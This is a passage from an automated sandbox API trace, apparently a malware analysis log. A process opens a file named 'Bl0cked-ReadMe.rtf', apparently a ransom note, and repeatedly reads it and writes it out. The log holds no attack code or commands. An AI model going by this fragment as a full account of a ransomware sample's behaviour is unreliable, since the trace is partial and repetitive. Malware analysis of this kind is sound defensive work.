_wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0128.897] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0128.897] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x2ae3f8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0128.897] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0128.897] _get_osfhandle (_FileHandle=4) returned 0x54 [0128.897] GetFileType (hFile=0x54) returned 0x1 [0128.897] _get_osfhandle (_FileHandle=4) returned 0x54 [0128.897] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x2ae450 | out: lpFileSizeHigh=0x2ae450*=0x0) returned 0x1632 [0128.897] _get_osfhandle (_FileHandle=4) returned 0x54 [0128.897] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.897] _get_osfhandle (_FileHandle=4) returned 0x54 [0128.897] ReadFile (in: hFile=0x54, lpBuffer=0x2af288, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae478, lpOverlapped=0x0 | out: lpBuffer=0x2af288*, lpNumberOfBytesRead=0x2ae478*=0x200, lpOverlapped=0x0) returned 1 [0128.897] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.897] GetFileType (hFile=0x4c) returned 0x1 [0128.897] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.897] GetFileType (hFile=0x4c) returned 0x1 [0128.897] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.897] WriteFile (in: hFile=0x4c, lpBuffer=0x2af288*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af288*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.898] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.898] GetFileType (hFile=0x4c) returned 0x1 [0128.898] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.898] WriteFile (in: hFile=0x4c, lpBuffer=0x2af2d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af2d8*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.899] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.899] GetFileType (hFile=0x4c) returned 0x1 [0128.899] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.899] WriteFile (in: hFile=0x4c, lpBuffer=0x2af328*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af328*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.899] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.899] GetFileType (hFile=0x4c) returned 0x1 [0128.899] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.899] WriteFile (in: hFile=0x4c, lpBuffer=0x2af378*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af378*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.899] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.899] GetFileType (hFile=0x4c) returned 0x1 [0128.899] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.899] WriteFile (in: hFile=0x4c, lpBuffer=0x2af3c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af3c8*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.899] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.899] GetFileType (hFile=0x4c) returned 0x1 [0128.899] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.899] WriteFile (in: hFile=0x4c, lpBuffer=0x2af418*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af418*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.899] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.899] GetFileType (hFile=0x4c) returned 0x1 [0128.899] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.899] WriteFile (in: hFile=0x4c, lpBuffer=0x2af468*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af468*, lpNumberOfBytesWritten=0x2ae46c*=0x20, lpOverlapped=0x0) returned 1 [0128.899] _get_osfhandle (_FileHandle=4) returned 0x54 [0128.899] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae458 | out: lpNewFilePointer=0x0) returned 1 [0128.899] _get_osfhandle (_FileHandle=4) returned 0x54 [0128.899] ReadFile (in: hFile=0x54, lpBuffer=0x2af288, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae478, lpOverlapped=0x0 | out: lpBuffer=0x2af288*, lpNumberOfBytesRead=0x2ae478*=0x200, lpOverlapped=0x0) returned 1 [0128.899] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.899] GetFileType (hFile=0x4c) returned 0x1 [0128.899] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.899] GetFileType (hFile=0x4c) returned 0x1 [0128.899] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.899] WriteFile (in: hFile=0x4c, lpBuffer=0x2af288*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af288*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.900] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.900] GetFileType (hFile=0x4c) returned 0x1 [0128.900] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.900] WriteFile (in: hFile=0x4c, lpBuffer=0x2af2d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af2d8*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.900] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.900] GetFileType (hFile=0x4c) returned 0x1 [0128.900] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.900] WriteFile (in: hFile=0x4c, lpBuffer=0x2af328*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af328*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.900] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.900] GetFileType (hFile=0x4c) returned 0x1 [0128.900] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.900] WriteFile (in: hFile=0x4c, lpBuffer=0x2af378*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af378*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.900] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.900] GetFileType (hFile=0x4c) returned 0x1 [0128.900] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.900] WriteFile (in: hFile=0x4c, lpBuffer=0x2af3c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af3c8*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.900] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.900] GetFileType (hFile=0x4c) returned 0x1 [0128.900] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.900] WriteFile (in: hFile=0x4c, lpBuffer=0x2af418*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af418*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.900] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.900] GetFileType (hFile=0x4c) returned 0x1 [0128.900] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.900] WriteFile (in: hFile=0x4c, lpBuffer=0x2af468*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af468*, lpNumberOfBytesWritten=0x2ae46c*=0x20, lpOverlapped=0x0) returned 1 [0128.900] _get_osfhandle (_FileHandle=4) returned 0x54 [0128.900] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae458 | out: lpNewFilePointer=0x0) returned 1 [0128.900] _get_osfhandle (_FileHandle=4) returned 0x54 [0128.900] ReadFile (in: hFile=0x54, lpBuffer=0x2af288, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae478, lpOverlapped=0x0 | out: lpBuffer=0x2af288*, lpNumberOfBytesRead=0x2ae478*=0x200, lpOverlapped=0x0) returned 1 [0128.900] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.900] GetFileType (hFile=0x4c) returned 0x1 [0128.900] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.900] GetFileType (hFile=0x4c) returned 0x1 [0128.900] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.900] WriteFile (in: hFile=0x4c, lpBuffer=0x2af288*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af288*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.901] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.901] GetFileType (hFile=0x4c) returned 0x1 [0128.901] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.901] WriteFile (in: hFile=0x4c, lpBuffer=0x2af2d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af2d8*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.901] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.901] GetFileType (hFile=0x4c) returned 0x1 [0128.901] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.901] WriteFile (in: hFile=0x4c, lpBuffer=0x2af328*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af328*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.901] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.901] GetFileType (hFile=0x4c) returned 0x1 [0128.901] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.901] WriteFile (in: hFile=0x4c, lpBuffer=0x2af378*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af378*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.901] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.901] GetFileType (hFile=0x4c) returned 0x1 [0128.901] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.901] WriteFile (in: hFile=0x4c, lpBuffer=0x2af3c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af3c8*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.901] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.901] GetFileType (hFile=0x4c) returned 0x1 [0128.901] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.901] WriteFile (in: hFile=0x4c, lpBuffer=0x2af418*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af418*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.901] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.901] GetFileType (hFile=0x4c) returned 0x1 [0128.901] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.901] WriteFile (in: hFile=0x4c, lpBuffer=0x2af468*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af468*, lpNumberOfBytesWritten=0x2ae46c*=0x20, lpOverlapped=0x0) returned 1 [0128.901] _get_osfhandle (_FileHandle=4) returned 0x54 [0128.901] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae458 | out: lpNewFilePointer=0x0) returned 1 [0128.901] _get_osfhandle (_FileHandle=4) returned 0x54 [0128.901] ReadFile (in: hFile=0x54, lpBuffer=0x2af288, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae478, lpOverlapped=0x0 | out: lpBuffer=0x2af288*, lpNumberOfBytesRead=0x2ae478*=0x200, lpOverlapped=0x0) returned 1 [0128.902] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.902] GetFileType (hFile=0x4c) returned 0x1 [0128.902] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.902] GetFileType (hFile=0x4c) returned 0x1 [0128.902] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.902] WriteFile (in: hFile=0x4c, lpBuffer=0x2af288*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af288*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.902] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.902] GetFileType (hFile=0x4c) returned 0x1 [0128.902] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.902] WriteFile (in: hFile=0x4c, lpBuffer=0x2af2d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af2d8*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.902] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.902] GetFileType (hFile=0x4c) returned 0x1 [0128.902] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.902] WriteFile (in: hFile=0x4c, lpBuffer=0x2af328*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af328*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.902] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.902] GetFileType (hFile=0x4c) returned 0x1 [0128.902] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.902] WriteFile (in: hFile=0x4c, lpBuffer=0x2af378*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af378*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.902] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.902] GetFileType (hFile=0x4c) returned 0x1 [0128.902] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.902] WriteFile (in: hFile=0x4c, lpBuffer=0x2af3c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af3c8*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.902] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.902] GetFileType (hFile=0x4c) returned 0x1 [0128.902] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.902] WriteFile (in: hFile=0x4c, lpBuffer=0x2af418*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af418*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.902] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.902] GetFileType (hFile=0x4c) returned 0x1 [0128.902] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.902] WriteFile (in: hFile=0x4c, lpBuffer=0x2af468*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af468*, lpNumberOfBytesWritten=0x2ae46c*=0x20, lpOverlapped=0x0) returned 1 [0128.902] _get_osfhandle (_FileHandle=4) returned 0x54 [0128.902] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae458 | out: lpNewFilePointer=0x0) returned 1 [0128.902] _get_osfhandle (_FileHandle=4) returned 0x54 [0128.903] ReadFile (in: hFile=0x54, lpBuffer=0x2af288, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae478, lpOverlapped=0x0 | out: lpBuffer=0x2af288*, lpNumberOfBytesRead=0x2ae478*=0x200, lpOverlapped=0x0) returned 1 [0128.903] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.903] GetFileType (hFile=0x4c) returned 0x1 [0128.903] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.903] GetFileType (hFile=0x4c) returned 0x1 [0128.903] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.903] WriteFile (in: hFile=0x4c, lpBuffer=0x2af288*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af288*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.903] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.903] GetFileType (hFile=0x4c) returned 0x1 [0128.903] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.903] WriteFile (in: hFile=0x4c, lpBuffer=0x2af2d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af2d8*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.903] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.903] GetFileType (hFile=0x4c) returned 0x1 [0128.903] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.903] WriteFile (in: hFile=0x4c, lpBuffer=0x2af328*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af328*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.903] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.903] GetFileType (hFile=0x4c) returned 0x1 [0128.903] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.903] WriteFile (in: hFile=0x4c, lpBuffer=0x2af378*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af378*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.903] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.903] GetFileType (hFile=0x4c) returned 0x1 [0128.903] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.903] WriteFile (in: hFile=0x4c, lpBuffer=0x2af3c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af3c8*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.903] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.903] GetFileType (hFile=0x4c) returned 0x1 [0128.903] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.903] WriteFile (in: hFile=0x4c, lpBuffer=0x2af418*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af418*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.903] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.903] GetFileType (hFile=0x4c) returned 0x1 [0128.903] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.903] WriteFile (in: hFile=0x4c, lpBuffer=0x2af468*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af468*, lpNumberOfBytesWritten=0x2ae46c*=0x20, lpOverlapped=0x0) returned 1 [0128.903] _get_osfhandle (_FileHandle=4) returned 0x54 [0128.904] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae458 | out: lpNewFilePointer=0x0) returned 1 [0128.904] _get_osfhandle (_FileHandle=4) returned 0x54 [0128.904] ReadFile (in: hFile=0x54, lpBuffer=0x2af288, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae478, lpOverlapped=0x0 | out: lpBuffer=0x2af288*, lpNumberOfBytesRead=0x2ae478*=0x200, lpOverlapped=0x0) returned 1 [0128.904] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.904] GetFileType (hFile=0x4c) returned 0x1 [0128.904] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.904] GetFileType (hFile=0x4c) returned 0x1 [0128.904] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.904] WriteFile (in: hFile=0x4c, lpBuffer=0x2af288*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af288*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.904] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.904] GetFileType (hFile=0x4c) returned 0x1 [0128.904] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.904] WriteFile (in: hFile=0x4c, lpBuffer=0x2af2d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af2d8*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.904] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.904] GetFileType (hFile=0x4c) returned 0x1 [0128.904] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.904] WriteFile (in: hFile=0x4c, lpBuffer=0x2af328*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af328*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.904] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.904] GetFileType (hFile=0x4c) returned 0x1 [0128.904] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.904] WriteFile (in: hFile=0x4c, lpBuffer=0x2af378*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af378*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.904] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.904] GetFileType (hFile=0x4c) returned 0x1 [0128.904] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.904] WriteFile (in: hFile=0x4c, lpBuffer=0x2af3c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af3c8*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.905] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.905] GetFileType (hFile=0x4c) returned 0x1 [0128.905] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.905] WriteFile (in: hFile=0x4c, lpBuffer=0x2af418*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af418*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.905] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.905] GetFileType (hFile=0x4c) returned 0x1 [0128.905] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.905] WriteFile (in: hFile=0x4c, lpBuffer=0x2af468*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af468*, lpNumberOfBytesWritten=0x2ae46c*=0x20, lpOverlapped=0x0) returned 1 [0128.905] _get_osfhandle (_FileHandle=4) returned 0x54 [0128.905] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae458 | out: lpNewFilePointer=0x0) returned 1 [0128.905] _get_osfhandle (_FileHandle=4) returned 0x54 [0128.905] ReadFile (in: hFile=0x54, lpBuffer=0x2af288, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae478, lpOverlapped=0x0 | out: lpBuffer=0x2af288*, lpNumberOfBytesRead=0x2ae478*=0x200, lpOverlapped=0x0) returned 1 [0128.905] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.905] GetFileType (hFile=0x4c) returned 0x1 [0128.905] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.905] GetFileType (hFile=0x4c) returned 0x1 [0128.905] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.905] WriteFile (in: hFile=0x4c, lpBuffer=0x2af288*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af288*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.905] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.905] GetFileType (hFile=0x4c) returned 0x1 [0128.905] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.905] WriteFile (in: hFile=0x4c, lpBuffer=0x2af2d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af2d8*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.905] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.905] GetFileType (hFile=0x4c) returned 0x1 [0128.905] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.905] WriteFile (in: hFile=0x4c, lpBuffer=0x2af328*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af328*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.906] GetFileType (hFile=0x4c) returned 0x1 [0128.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.906] WriteFile (in: hFile=0x4c, lpBuffer=0x2af378*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af378*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.906] GetFileType (hFile=0x4c) returned 0x1 [0128.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.906] WriteFile (in: hFile=0x4c, lpBuffer=0x2af3c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af3c8*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.906] GetFileType (hFile=0x4c) returned 0x1 [0128.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.906] WriteFile (in: hFile=0x4c, lpBuffer=0x2af418*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af418*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.906] GetFileType (hFile=0x4c) returned 0x1 [0128.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.906] WriteFile (in: hFile=0x4c, lpBuffer=0x2af468*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af468*, lpNumberOfBytesWritten=0x2ae46c*=0x20, lpOverlapped=0x0) returned 1 [0128.906] _get_osfhandle (_FileHandle=4) returned 0x54 [0128.906] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae458 | out: lpNewFilePointer=0x0) returned 1 [0128.906] _get_osfhandle 